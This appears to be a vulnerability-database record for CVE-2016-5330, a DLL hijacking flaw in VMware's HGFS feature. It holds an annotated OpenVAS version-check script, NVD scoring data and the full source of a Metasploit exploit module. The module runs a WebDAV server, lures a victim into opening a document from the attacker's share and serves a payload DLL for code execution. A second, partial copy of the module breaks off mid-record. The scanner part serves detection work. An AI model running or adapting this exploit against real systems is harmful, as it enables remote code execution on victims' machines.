ID OPENVAS:1361412562310809022 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-07-05T00:00:00
Description
VMware Workstation is installed on the host
and is prone to a privilege escalation vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)
#
# Authors:
# Rinu Kuriakose <krinu@secpod.com>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE of the product whose detected version is looked up further down via
# get_app_version(cpe:CPE).
CPE = "cpe:/a:vmware:workstation";
# Metadata registration. This branch only declares the VT's identity, scoring,
# texts and prerequisites, then exits; no host is examined here.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.809022");
script_version("2019-07-05T09:29:25+0000");
script_cve_id("CVE-2016-5330");
script_bugtraq_id(92323);
# The score and vector below use CVSS v2 notation (AV:L/AC:M/Au:N/...).
# NVD also rates this CVE 7.8 (HIGH) under CVSS v3.0, so triage that keys
# only on the 4.4 here will rank the finding lower than the v3 rating does.
script_tag(name:"cvss_base", value:"4.4");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)");
script_tag(name:"creation_date", value:"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)");
# The finding is derived from a detected version string only (see "vuldetect"
# below); the vulnerable behaviour itself is never exercised.
script_tag(name:"qod_type", value:"executable_version");
script_name("VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)");
script_tag(name:"summary", value:"The host is installed with VMware Workstation
and is prone to a privilege escalation vulnerability.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
# NOTE(review): the insight text places the DLL hijack in VMware Tools running
# on Microsoft Windows, while this VT is the Linux-host variant and tests the
# Workstation version. NVD describes CVE-2016-5330 as an untrusted search path
# (CWE-426) in the HGFS feature of VMware Tools. Presumably a hit means the
# host product is below the fixed release rather than that the Linux host
# itself loads the DLL - confirm against VMSA-2016-0010 before reporting the
# host as directly exploitable.
script_tag(name:"insight", value:"The flaw is due to a DLL hijacking
vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature
running on Microsoft Windows.");
script_tag(name:"impact", value:"Successful exploitation will allow
local users to gain extra privileges.");
# The affected range stated here (12.1.x before 12.1.1) is the same range the
# detection code tests for.
script_tag(name:"affected", value:"VMware Workstation version 12.1.x before
12.1.1 on Linux.");
script_tag(name:"solution", value:"Upgrade to VMware Workstation version
12.1.1 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www.vmware.com/security/advisories/VMSA-2016-0010.html");
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
# Registered as an information-gathering check.
script_category(ACT_GATHER_INFO);
script_family("General");
# Prerequisites: the named detection script and the "VMware/Linux/Installed"
# key. Presumably that key is set by the detection script and the VT is
# skipped when it is absent - verify against gb_vmware_prdts_detect_lin.nasl.
script_dependencies("gb_vmware_prdts_detect_lin.nasl");
script_mandatory_keys("VMware/Linux/Installed");
# Leave before the detection code whenever only metadata is being collected.
exit(0);
}
include("host_details.inc");
include("version_func.inc");
# Version-only check: report when the detected VMware Workstation version is a
# 12.1.x release older than the fixed 12.1.1.
wsVersion = get_app_version(cpe:CPE);
if(!wsVersion)
  exit(0);  # no version available for this CPE, nothing to compare

# Both conditions must hold: the version is on the 12.1 branch and it is
# below 12.1.1. Any other version ends the script without a result; the
# absence of a finding is therefore not a statement that the host is
# unaffected.
if(wsVersion =~ "^(12\.1)" && version_is_less(version:wsVersion, test_version:"12.1.1"))
{
  fixNotice = report_fixed_ver(installed_version:wsVersion, fixed_version:"12.1.1");
  security_message(data:fixNotice);
  exit(0);
}
{"id": "OPENVAS:1361412562310809022", "type": "openvas", "bulletinFamily": "scanner", "title": "VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)", "description": "The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.", "published": "2016-09-01T00:00:00", "modified": "2019-07-05T00:00:00", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809022", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://www.vmware.com/security/advisories/VMSA-2016-0010.html"], "cvelist": ["CVE-2016-5330"], "lastseen": "2019-07-17T14:26:09", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-5330"]}, {"type": "zdt", "idList": ["1337DAY-ID-27418"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809023", "OPENVAS:1361412562310809021", "OPENVAS:1361412562310809020", "OPENVAS:1361412562310809024", "OPENVAS:1361412562310809031", "OPENVAS:1361412562310105851"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/VMHGFS_WEBDAV_DLL_SIDELOAD"]}, {"type": "kaspersky", "idList": ["KLA10854"]}, {"type": "exploitdb", "idList": ["EDB-ID:41711"]}, {"type": "nessus", "idList": ["VMWARE_VMSA-2016-0010_REMOTE.NASL", "VMWARE_WORKSTATION_LINUX_VMSA_2016_0010.NASL", "MACOSX_FUSION_VMSA_2016_0010.NASL", "VMWARE_PLAYER_WIN_VMSA_2016_0010.NASL", "VMWARE_WORKSTATION_WIN_VMSA_2016_0010.NASL", "VMWARE_PLAYER_LINUX_VMSA_2016_0010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138289"]}, {"type": "vmware", "idList": ["VMSA-2016-0010"]}], "modified": "2019-07-17T14:26:09", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2019-07-17T14:26:09", "rev": 2}, "vulnersScore": 5.6}, "pluginID": "1361412562310809022", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware 
Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809022\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL 
hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation version 12.1.x before\n 12.1.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "General"}
{"cve": [{"lastseen": "2020-10-03T12:10:47", "description": "Untrusted search path vulnerability in the HGFS (aka Shared Folders) feature in VMware Tools 10.0.5 in VMware ESXi 5.0 through 6.0, VMware Workstation Pro 12.1.x before 12.1.1, VMware Workstation Player 12.1.x before 12.1.1, and VMware Fusion 8.1.x before 8.1.1 allows local users to gain privileges via a Trojan horse DLL in the current working directory.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-08T01:59:00", "title": "CVE-2016-5330", "type": "cve", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5330"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/a:vmware:fusion:8.1", "cpe:/a:vmware:tools:10.0.5", "cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:5.0", "cpe:/a:vmware:workstation_player:12.1.1", "cpe:/a:vmware:workstation_player:12.1", "cpe:/a:vmware:fusion:8.1.1", "cpe:/o:vmware:esxi:5.5", "cpe:/a:vmware:workstation_pro:12.1", "cpe:/a:vmware:workstation_pro:12.1.1", "cpe:/o:vmware:esxi:5.1"], "id": "CVE-2016-5330", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5330", "cvss": {"score": 
4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:workstation_pro:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:8.1:*:*:*:*:mac_os_x:*:*", "cpe:2.3:a:vmware:workstation_player:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation_player:12.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:tools:10.0.5:*:*:*:*:windows:*:*", "cpe:2.3:a:vmware:fusion:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation_pro:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:8.1.1:*:*:*:*:mac_os_x:*:*"]}], "exploitdb": [{"lastseen": "2017-03-23T13:17:20", "description": "VMware Host Guest Client Redirector - DLL Side Loading (Metasploit). CVE-2016-5330. Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41711", "href": "https://www.exploit-db.com/exploits/41711/", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\r\n 'Description' => %q{\r\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\r\n a component of VMware Tools. This issue can be exploited by luring a victim into\r\n opening a document from the attacker's share. An attacker can exploit this issue to\r\n execute arbitrary code with the privileges of the target user. This can potentially\r\n result in the attacker taking complete control of the affected system. 
If the WebDAV\r\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\r\n },\r\n 'Author' => 'Yorick Koster',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2016-5330'],\r\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\r\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Payload' => { 'Space' => 2048, },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\r\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Aug 5 2016',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\r\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\r\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\r\n ], self.class)\r\n\r\n # no SSL\r\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request)\r\n when 'PROPFIND'\r\n process_propfind(cli, request)\r\n when 'GET'\r\n process_get(cli, request)\r\n else\r\n print_status(\"#{request.method} => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n end\r\n end\r\n\r\n\r\n def process_get(cli, request)\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n webdav = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n if (request.uri =~ /vmhgfs\\.dll$/i)\r\n print_status(\"GET => DLL Payload (#{request.uri})\")\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\r\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n return\r\n end\r\n\r\n if (request.uri =~ /\\.docx$/i)\r\n print_status(\"GET => DOCX (#{request.uri})\")\r\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\r\n return\r\n end\r\n\r\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\r\n print_status(\"GET => REDIRECT (#{request.uri})\")\r\n resp = create_response(200, \"OK\")\r\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n\r\n print_status(\"GET => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n end\r\n\r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request)\r\n print_status(\"OPTIONS #{request.uri}\")\r\n headers = {\r\n 'MS-Author-Via' => 'DAV',\r\n 'DASL' => '<DAV:sql>',\r\n 'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\r\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',\r\n 'Cache-Control' => 'private'\r\n }\r\n resp = create_response(207, \"Multi-Status\")\r\n headers.each_pair {|k,v| resp[k] = v }\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n\r\n #\r\n # PROPFIND 
requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request)\r\n path = request.uri\r\n print_status(\"PROPFIND #{path}\")\r\n body = ''\r\n\r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n my_uri = \"http://#{my_host}/\"\r\n\r\n if path !~ /\\/$/\r\n\r\n if blacklisted_path?(path)\r\n print_status \"PROPFIND => 404 (#{path})\"\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n return\r\n end\r\n\r\n if path.index(\".\")\r\n print_status \"PROPFIND => 207 File (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n return\r\n else\r\n print_status \"PROPFIND => 301 (#{path})\"\r\n resp = create_response(301, 
\"Moved\")\r\n resp[\"Location\"] = path + \"/\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n end\r\n\r\n print_status \"PROPFIND => 207 Directory (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\r\n if request[\"Depth\"].to_i > 0\r\n trail = path.split(\"/\")\r\n trail.shift\r\n case trail.length\r\n when 0\r\n body << generate_shares(path)\r\n when 1\r\n body << generate_files(path)\r\n end\r\n else\r\n print_status \"PROPFIND => 207 Top-Level Directory\"\r\n end\r\n\r\n body << \"</D:multistatus>\"\r\n\r\n body.gsub!(/\\t/, '')\r\n\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n end\r\n\r\n def generate_shares(path)\r\n share_name = datastore['SHARENAME']\r\n%Q|\r\n<D:response xmlns:lp1=\"DAV:\" 
xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{share_name}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n\r\n def generate_files(path)\r\n trail = path.split(\"/\")\r\n return \"\" if trail.length < 2\r\n\r\n %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n\r\n def gen_timestamp(ttype=nil)\r\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n end\r\n\r\n def 
gen_datestamp(ttype=nil)\r\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n end\r\n\r\n # This method rejects requests that are known to break exploitation\r\n def blacklisted_path?(uri)\r\n return true if uri =~ /\\.exe/i\r\n return true if uri =~ /\\.(config|manifest)/i\r\n return true if uri =~ /desktop\\.ini/i\r\n return true if uri =~ /lib.*\\.dll/i\r\n return true if uri =~ /\\.tmp$/i\r\n return true if uri =~ /(pcap|packet)\\.dll/i\r\n false\r\n end\r\n\r\n def exploit\r\n\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\r\n\r\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n\r\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\r\n\r\n super\r\n end\r\nend", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41711/"}], "zdt": [{"lastseen": "2018-01-06T07:02:35", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-03-25T00:00:00", "title": "VMware Host Guest Client Redirector - DLL Side Loading Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2017-03-25T00:00:00", "href": "https://0day.today/exploit/description/27418", "id": "1337DAY-ID-27418", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\r\n 'Description' => %q{\r\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\r\n a 
component of VMware Tools. This issue can be exploited by luring a victim into\r\n opening a document from the attacker's share. An attacker can exploit this issue to\r\n execute arbitrary code with the privileges of the target user. This can potentially\r\n result in the attacker taking complete control of the affected system. If the WebDAV\r\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\r\n },\r\n 'Author' => 'Yorick Koster',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2016-5330'],\r\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\r\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Payload' => { 'Space' => 2048, },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\r\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Aug 5 2016',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\r\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\r\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\r\n ], self.class)\r\n \r\n # no SSL\r\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request)\r\n when 'PROPFIND'\r\n process_propfind(cli, request)\r\n when 'GET'\r\n process_get(cli, request)\r\n else\r\n print_status(\"#{request.method} => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n resp['Content-Type'] 
